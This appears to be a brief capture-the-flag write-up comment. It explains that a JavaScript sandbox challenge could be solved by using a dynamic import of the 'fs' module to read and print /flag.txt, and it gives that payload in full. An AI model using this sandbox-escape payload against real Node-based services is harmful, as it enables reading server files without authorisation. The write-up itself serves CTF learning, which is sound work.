Rating:

Probably not the intended solution, but dynamic imports were still available so you could just do `import("fs").then(function(f) { console.log(f.readFileSync("/flag.txt").toString()) } );`